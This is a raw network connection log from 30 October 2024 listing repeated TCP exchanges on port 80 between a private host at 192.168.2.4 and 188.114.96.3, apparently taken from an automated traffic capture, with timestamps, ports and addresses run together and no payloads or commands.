                                                        Oct 30, 2024 05:22:40.354959011 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.631532907 CET8049774188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:40.683094025 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.756599903 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.757383108 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.762476921 CET8049774188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:40.762542963 CET4977480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.763349056 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:40.763431072 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.763546944 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:40.769068956 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.120750904 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.128685951 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.358603001 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.401880026 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.558119059 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.604964018 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.673676968 CET4977380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.676822901 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.677603006 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.683001995 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.683116913 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.683218002 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:41.688558102 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.691015959 CET8049775188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:41.691071033 CET4977580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.042752028 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.048207045 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.279886007 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.323823929 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.491875887 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.542618036 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.622952938 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.623758078 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.628633022 CET8049776188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.628709078 CET4977680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.629105091 CET8049777188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.629172087 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.629291058 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.634541035 CET8049777188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:42.980463028 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:42.986650944 CET8049777188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.238918066 CET8049777188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.292467117 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.371526003 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.372121096 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.388314962 CET8049777188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.388330936 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.388386011 CET4977780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.388449907 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.388554096 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.395499945 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.491614103 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.496922970 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.497005939 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.497107983 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.502367973 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.745708942 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.751074076 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.751182079 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.855068922 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:43.860403061 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:43.989619970 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.042722940 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.099487066 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.151972055 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.191812038 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.245632887 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.421924114 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.464355946 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.557796001 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.557806969 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.559370995 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.563744068 CET8049779188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.563764095 CET8049778188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.563829899 CET4977980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.563865900 CET4977880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.564646006 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.564726114 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.564860106 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.570108891 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:44.927875042 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:44.933301926 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.167274952 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.214519024 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.364953995 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.417484999 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.496565104 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.497821093 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.502465963 CET8049780188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.502587080 CET4978080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.503319025 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.503429890 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.503715038 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.509071112 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:45.855384111 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:45.860984087 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.108968019 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.151983976 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.429713964 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.429755926 CET8049781188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.429896116 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.563301086 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.568605900 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.568730116 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.568852901 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.574107885 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:46.917681932 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:46.924523115 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.163036108 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.214457035 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.478554964 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.526897907 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.599169970 CET4978180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.601737976 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.602140903 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.607470036 CET8049782188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.607486010 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.607570887 CET4978280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.607610941 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.608357906 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:47.613636017 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:47.995385885 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.000788927 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.212956905 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.261384010 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.532212973 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.532234907 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.532421112 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.657316923 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.657722950 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.663048029 CET8049784188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.663060904 CET8049783188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:48.663150072 CET4978380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.663167000 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.663301945 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:48.668554068 CET8049784188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.012535095 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.017983913 CET8049784188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.202703953 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.203577995 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.208030939 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.208165884 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.208282948 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.209095001 CET8049784188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.209151030 CET4978480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.213525057 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.429564953 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.435789108 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.435890913 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.436001062 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.441297054 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.558363914 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.563774109 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.563828945 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.792682886 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.798135996 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.813435078 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:49.855007887 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.029676914 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.073800087 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.120505095 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.167658091 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.344172001 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.344187975 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.344371080 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.571958065 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.572146893 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.605133057 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.605195999 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.610702991 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.610768080 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.611031055 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.611077070 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.616698980 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.621974945 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.622047901 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.625813961 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.631043911 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.980386972 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.988023043 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.224934101 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.277091026 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.431576967 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.480175018 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.554656982 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.555459976 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.566945076 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.567131996 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.567152023 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.569323063 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.569385052 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.572504044 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.917705059 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.931320906 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.176901102 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.230123043 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.514240026 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.558552980 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.631817102 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.637322903 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.637432098 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.637484074 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.642740965 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.996052027 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.001404047 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.233419895 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.276946068 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.444359064 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.495778084 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.567547083 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.568396091 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573577881 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.573652983 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573687077 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.573770046 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573873997 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.579117060 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.933357954 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.938848972 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.177365065 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.230040073 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.423239946 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.423285961 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.423429966 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.544001102 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.544799089 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.549777985 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.549864054 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.550153017 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.550237894 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.550302982 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.555671930 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.902040958 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.907479048 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.137881994 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.138395071 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.143811941 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.143886089 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.143929958 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.144006968 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.144041061 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.149317026 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.257710934 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.263237000 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.263346910 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.263490915 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.268829107 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.495832920 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.501235008 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.501405001 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.620784044 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.626291990 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.670042992 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.670828104 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671462059 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671478033 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671525955 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.671555042 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.671922922 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671973944 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.672435045 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.672494888 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.672540903 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.672596931 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.673002958 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.673051119 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.674607038 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.674659014 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.677349091 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.677398920 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.677481890 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.678287983 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.787363052 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.787384987 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.788270950 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793107986 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.793365955 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.793441057 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793469906 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793673038 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.796452999 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.796577930 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.801989079 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.152132034 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.157893896 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.403933048 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.448900938 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.615575075 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.667546988 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.741004944 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.746412039 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.746542931 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.746654987 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.751970053 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.105290890 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.110713005 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.341034889 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.386293888 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.538539886 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.589541912 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.664568901 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.665102005 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670480013 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.670574903 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.670584917 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670648098 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670756102 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.676186085 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.027770996 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.033062935 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.258132935 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.308190107 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.447565079 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.495688915 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.569590092 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.570410013 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575346947 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.575412035 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575685024 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.575774908 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575903893 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.581204891 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.933326006 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.938699961 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.170702934 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.214561939 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.531229019 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.573796034 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.647258043 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.648149967 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653147936 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.653558969 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.653615952 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653657913 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653740883 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.659075022 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.012856960 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.018548965 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.260462999 CET8049810188.114.96.3192.168.2.4
